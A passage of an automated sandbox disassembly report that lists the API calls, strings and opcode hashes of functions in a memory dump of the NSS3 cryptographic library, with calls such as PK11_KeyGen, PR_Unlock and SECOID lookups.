Part of subcall function 6CA04C70: PR_Unlock.NSS3(?,?,?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAFAE93
PR_CallOnce.NSS3(6CBE2AA4,6CAE12D0), ref: 6CAFAECC
PL_FreeArenaPool.NSS3 ref: 6CAFAEDE
PL_FinishArenaPool.NSS3 ref: 6CAFAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAFAEF5
PL_FinishArenaPool.NSS3 ref: 6CAFAF16

Strings

security, xrefs: 6CAFADEE

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: c5b43018343bfcbb0dafba10a3f8e108705c8d161331cdb7ed07e49fef0b8126
Instruction ID: 6668044da23236f77b13cd10fcff197720ceb3ce0cfcf7c1df92ca408f420444
Opcode Fuzzy Hash: c5b43018343bfcbb0dafba10a3f8e108705c8d161331cdb7ed07e49fef0b8126
Instruction Fuzzy Hash: 5E4159B290022067E7214A14DC85BEA32B9AF4631CF140925F96496B41FB35ADCAC7D3

Function 6CAEE8C0 Relevance: 22.9, APIs: 15, Instructions: 353memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(0000001C,?,6CAEE853,?,FFFFFFFF,?,?,6CAEB0CC,?,6CAEB4A0,?,00000000), ref: 6CAEE8D9

Part of subcall function 6CAE0D30: calloc.MOZGLUE ref: 6CAE0D50
Part of subcall function 6CAE0D30: TlsGetValue.KERNEL32 ref: 6CAE0D6D

Part of subcall function 6CAEC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CAEDAE2,?), ref: 6CAEC6C2

PORT_ArenaMark_Util.NSS3(?), ref: 6CAEE972
PORT_ArenaMark_Util.NSS3(?), ref: 6CAEE9C2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAEEA00
PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6CAEEA3F
SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6CAEEA5A
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CAEEA81
SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6CAEEA9E
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CAEEACF
PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6CAEEB56
PK11_FreeSymKey.NSS3(00000000), ref: 6CAEEBC2
SECOID_FindOID_Util.NSS3(?), ref: 6CAEEBEC
free.MOZGLUE(00000000), ref: 6CAEEC58

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
String ID:
API String ID: 759478663-0
Opcode ID: 7027a4252114bc534bc3961563af8a154f5e20b74ee4785f48b0da9a537ea639
Instruction ID: 473a25db3ed69c6e55e67cdea5ec6cc6172f3050df82c395dc4092a858d47235
Opcode Fuzzy Hash: 7027a4252114bc534bc3961563af8a154f5e20b74ee4785f48b0da9a537ea639
Instruction Fuzzy Hash: ECC182B1E012059FEB00DFA9D981BAA77F4BF4C318F180469E906A7B51E731E884DBD1

Function 6CAB6AF0 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 101COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptFinal), ref: 6CAB6B16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAB6B44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB6B53

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAB6B69
PR_LogPrint.NSS3( pLastPart = 0x%p,?), ref: 6CAB6B85
PR_LogPrint.NSS3( pulLastPartLen = 0x%p,?), ref: 6CAB6BA0
PR_LogPrint.NSS3( *pulLastPartLen = 0x%x,?), ref: 6CAB6C0A

Strings

*pulLastPartLen = 0x%x, xrefs: 6CAB6C05
pLastPart = 0x%p, xrefs: 6CAB6B80
C_DecryptFinal, xrefs: 6CAB6B11
pulLastPartLen = 0x%p, xrefs: 6CAB6B9B
(CK_INVALID_HANDLE), xrefs: 6CAB6B4C
hSession = 0x%x, xrefs: 6CAB6B2E, 6CAB6B3E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulLastPartLen = 0x%x$ hSession = 0x%x$ pLastPart = 0x%p$ pulLastPartLen = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptFinal
API String ID: 1003633598-2565524109
Opcode ID: 784b70e67f29ddc344441657a1e2fdb48116c4c408b274fe42c0b3a31c247fae
Instruction ID: 3abcea45b9b5fe97737319eae7a9cb24051f22003b68942a15aacb34fd8bcfa1
Opcode Fuzzy Hash: 784b70e67f29ddc344441657a1e2fdb48116c4c408b274fe42c0b3a31c247fae
Instruction Fuzzy Hash: EC31F435641185AFDB04DF54ED88F9E77B9EB4A759F084028E508A7B12DF309988CB62

Function 6CAC29A0 Relevance: 22.8, APIs: 15, Instructions: 292COMMON

Download Yara Rule

APIs

PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,6CA96A5E,00000001,00000000,?,6CA96540,?,0000000D,00000000), ref: 6CAC2A39
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CA96A5E,00000001,00000000,?,6CA96540,?,0000000D,00000000), ref: 6CAC2A5B
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,6CA96A5E,00000001,00000000,?,6CA96540,?,0000000D), ref: 6CAC2A6F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA96A5E,00000001), ref: 6CAC2AAD
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA96A5E,00000001,00000000), ref: 6CAC2ACB
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA96A5E,00000001), ref: 6CAC2ADF
PR_Unlock.NSS3(?), ref: 6CAC2B38
PR_Unlock.NSS3(?), ref: 6CAC2B8B

Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707AD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707CD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707D6
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA0204A), ref: 6CA707E4
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,6CA0204A), ref: 6CA70864
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA70880
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,6CA0204A), ref: 6CA708CB
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708D7
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708FB

PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,6CA96A5E,00000001,00000000,?,6CA96540,?,0000000D,00000000,?), ref: 6CAC2CA2

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSectioncalloc$ErrorImportK11_Public
String ID:
API String ID: 2580468248-0
Opcode ID: 366206f1a3331e526eb43420b98861f83c1908adbb935baa26ab0364ac80080c
Instruction ID: baf3134d213fdb274b32c872501a724672fd915183f7892857eea5445ce8ed0c
Opcode Fuzzy Hash: 366206f1a3331e526eb43420b98861f83c1908adbb935baa26ab0364ac80080c
Instruction Fuzzy Hash: 84B104B4E00605DFEB10DF68D988B9EB7B5FF09308F585629E805A7B11D731E984CB92

Function 6CB9AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB49890: TlsGetValue.KERNEL32(?,?,?,6CB497EB), ref: 6CB4989E

EnterCriticalSection.KERNEL32(?), ref: 6CB9AF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6CB9AFCE
PR_SetPollableEvent.NSS3(?), ref: 6CB9AFD9
EnterCriticalSection.KERNEL32(?), ref: 6CB9AFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6CB9B00F
_PR_MD_UNLOCK.NSS3(?), ref: 6CB9B02F
_PR_MD_UNLOCK.NSS3(?), ref: 6CB9B070
PR_JoinThread.NSS3(?), ref: 6CB9B07B
free.MOZGLUE(?), ref: 6CB9B084
EnterCriticalSection.KERNEL32(?), ref: 6CB9B09B
_PR_MD_UNLOCK.NSS3(?), ref: 6CB9B0C4
PR_JoinThread.NSS3(?), ref: 6CB9B0F3
free.MOZGLUE(?), ref: 6CB9B0FC
PR_JoinThread.NSS3(?), ref: 6CB9B137
free.MOZGLUE(?), ref: 6CB9B140

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 838fe7281df6d3cd88b2e48bc5b8d0461025488749ac9f50c32262ed819976ec
Instruction ID: 97fcbd31422819df62de80d569cfeb0e5368b8d2d73fe06f53228523133ca8fb
Opcode Fuzzy Hash: 838fe7281df6d3cd88b2e48bc5b8d0461025488749ac9f50c32262ed819976ec
Instruction Fuzzy Hash: F8917DB5900651DFCB10DF14C88084ABBF5FF4A35872985A9D81A9BB26E732FC45CF91

Function 6CAA2980 Relevance: 22.7, APIs: 15, Instructions: 217COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CA89E71,?,?,6CA9F03D), ref: 6CAA29A2
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA89E71,?), ref: 6CAA29B6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CA89E71,?,?,6CA9F03D), ref: 6CAA29E2
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA89E71,?), ref: 6CAA29F6
PL_HashTableLookup.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA89E71,?), ref: 6CAA2A06
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA89E71), ref: 6CAA2A13

Part of subcall function 6CB2DD70: TlsGetValue.KERNEL32 ref: 6CB2DD8C
Part of subcall function 6CB2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB2DDB4

PR_Unlock.NSS3(?), ref: 6CAA2A6A
TlsGetValue.KERNEL32 ref: 6CAA2A98
EnterCriticalSection.KERNEL32(?), ref: 6CAA2AAC
PL_HashTableLookup.NSS3(?,?), ref: 6CAA2ABC
PR_Unlock.NSS3(?), ref: 6CAA2AC9
TlsGetValue.KERNEL32 ref: 6CAA2B3D
EnterCriticalSection.KERNEL32(?), ref: 6CAA2B51
PL_HashTableLookup.NSS3(?,6CA89E71), ref: 6CAA2B61
PR_Unlock.NSS3(?), ref: 6CAA2B6E

Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707AD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707CD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707D6
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA0204A), ref: 6CA707E4
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,6CA0204A), ref: 6CA70864
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA70880
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,6CA0204A), ref: 6CA708CB
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708D7
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708FB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterUnlock$HashLookupTable$calloc$Leave
String ID:
API String ID: 2204204336-0
Opcode ID: 5c8dc3e24e1d2bb8698d5dd7f51f3fd041e09254fce1506dfe5e9428ee9fdd58
Instruction ID: f58499b9a38ce1f632862a28a339c05da4048dc6151d70c2c2872ee0b3c28719
Opcode Fuzzy Hash: 5c8dc3e24e1d2bb8698d5dd7f51f3fd041e09254fce1506dfe5e9428ee9fdd58
Instruction Fuzzy Hash: 3C711676900604ABDB109F75DC459AAB7B8FF05358B198224EC1C8B712EB31E9E9C7E0

Function 6CA98DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6CA98E22
EnterCriticalSection.KERNEL32(?), ref: 6CA98E36
memset.VCRUNTIME140(?,00000000,?), ref: 6CA98E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6CA98E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CA98E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CA98EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6CA98EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CA98EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6CA98F00
free.MOZGLUE(?), ref: 6CA98F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6CA98F39
memset.VCRUNTIME140(?,00000000,?), ref: 6CA98F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6CA98F5B
PR_Unlock.NSS3(?), ref: 6CA98F72
PR_Unlock.NSS3(?), ref: 6CA98F82

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: ad4613369a8f3160b0f917f630cbcb3407498da5f119979f233a6542cba5a021
Instruction ID: 13b43a0e9d216f54f016f080607a5fa00e014a04f3b71086481c3a46f55ced28
Opcode Fuzzy Hash: ad4613369a8f3160b0f917f630cbcb3407498da5f119979f233a6542cba5a021
Instruction Fuzzy Hash: 7D51F4B2E10215AFEB009F68CC8596EB7B9FF45358F19412AEC189B700E731ED8487E1

Function 6CABCE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6CABCE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6CABCEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6CABCED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6CABCEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6CABCF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6CABCF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6CABCF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6CABCF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6CABCF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6CABCFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6CABCFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6CABCFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6CABCFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6CABD007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6CABD021

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: 4bde76fd2b725755e71c03708c769534062da1f4883cbdfcd276e26f8493db52
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: AD31A771B1291123EF0D04565E21BDE245E4B6930EF090138F90BF57C0FA95AF9B82E5

Function 6CB90FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6CB91000

Part of subcall function 6CB49BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CA71A48), ref: 6CB49BB3
Part of subcall function 6CB49BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CA71A48), ref: 6CB49BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6CB91016

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

PR_Unlock.NSS3(?), ref: 6CB91021

Part of subcall function 6CB2DD70: TlsGetValue.KERNEL32 ref: 6CB2DD8C
Part of subcall function 6CB2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB2DDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CB91046
PR_Unlock.NSS3(?), ref: 6CB9106B
PR_Lock.NSS3 ref: 6CB91079
PR_Unlock.NSS3 ref: 6CB91096
free.MOZGLUE(?), ref: 6CB910A7
free.MOZGLUE(?), ref: 6CB910B4
PR_DestroyCondVar.NSS3(?), ref: 6CB910BF
PR_DestroyCondVar.NSS3(?), ref: 6CB910CA
PR_DestroyCondVar.NSS3(?), ref: 6CB910D5
PR_DestroyCondVar.NSS3(?), ref: 6CB910E0
PR_DestroyLock.NSS3(?), ref: 6CB910EB
free.MOZGLUE(?), ref: 6CB91105

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: cea1047479e4f39bea0206ce959ace8f967e0ba3cc9cef530879a4261d4585ce
Instruction ID: 325e852dd294c879847343f4e5cd8a26c62d2cbe64f33f87c74ab311caffc31b
Opcode Fuzzy Hash: cea1047479e4f39bea0206ce959ace8f967e0ba3cc9cef530879a4261d4585ce
Instruction Fuzzy Hash: CF316CB9900841ABE7019F14ED41A99B779FF06358B584130E80913F61E732F9B8EBD2

Function 6CACEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6CACEE0B

Part of subcall function 6CAE0BE0: malloc.MOZGLUE(6CAD8D2D,?,00000000,?), ref: 6CAE0BF8
Part of subcall function 6CAE0BE0: TlsGetValue.KERNEL32(6CAD8D2D,?,00000000,?), ref: 6CAE0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CACEEE1

Part of subcall function 6CAC1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CAC1D7E
Part of subcall function 6CAC1D50: EnterCriticalSection.KERNEL32(?), ref: 6CAC1D8E
Part of subcall function 6CAC1D50: PR_Unlock.NSS3(?), ref: 6CAC1DD3

TlsGetValue.KERNEL32 ref: 6CACEE51
EnterCriticalSection.KERNEL32(?), ref: 6CACEE65
PR_Unlock.NSS3(?), ref: 6CACEEA2
free.MOZGLUE(?), ref: 6CACEEBB
PR_SetError.NSS3(00000000,00000000), ref: 6CACEED0
PR_Unlock.NSS3(?), ref: 6CACEF48
free.MOZGLUE(?), ref: 6CACEF68
PR_SetError.NSS3(00000000,00000000), ref: 6CACEF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6CACEFA4
free.MOZGLUE(?), ref: 6CACEFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CACF055
free.MOZGLUE(?), ref: 6CACF060

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: cee171ea73ef0f600f242c8805d70ff527c56a5e7224724fef869a4c7ba08b52
Instruction ID: 9467a72dd5eb16ea4bc8d387a1f7c46fa8fe6c6b82a3941033339d7fba7b52fd
Opcode Fuzzy Hash: cee171ea73ef0f600f242c8805d70ff527c56a5e7224724fef869a4c7ba08b52
Instruction Fuzzy Hash: B7818375B00209ABDF00DFA4DD45AEE7BB5BF08358F584024E909A3711EB35E964CBE2

Function 6CA94CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6CA94D80
PORT_Alloc_Util.NSS3(00000000), ref: 6CA94D95
PORT_NewArena_Util.NSS3(00000800), ref: 6CA94DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA94E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6CA94E43
PORT_NewArena_Util.NSS3(00000800), ref: 6CA94E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CA94E85
DER_Encode_Util.NSS3(?,?,6CBE05A4,00000000), ref: 6CA94EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CA94F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CA94F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA94F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CA94F7A
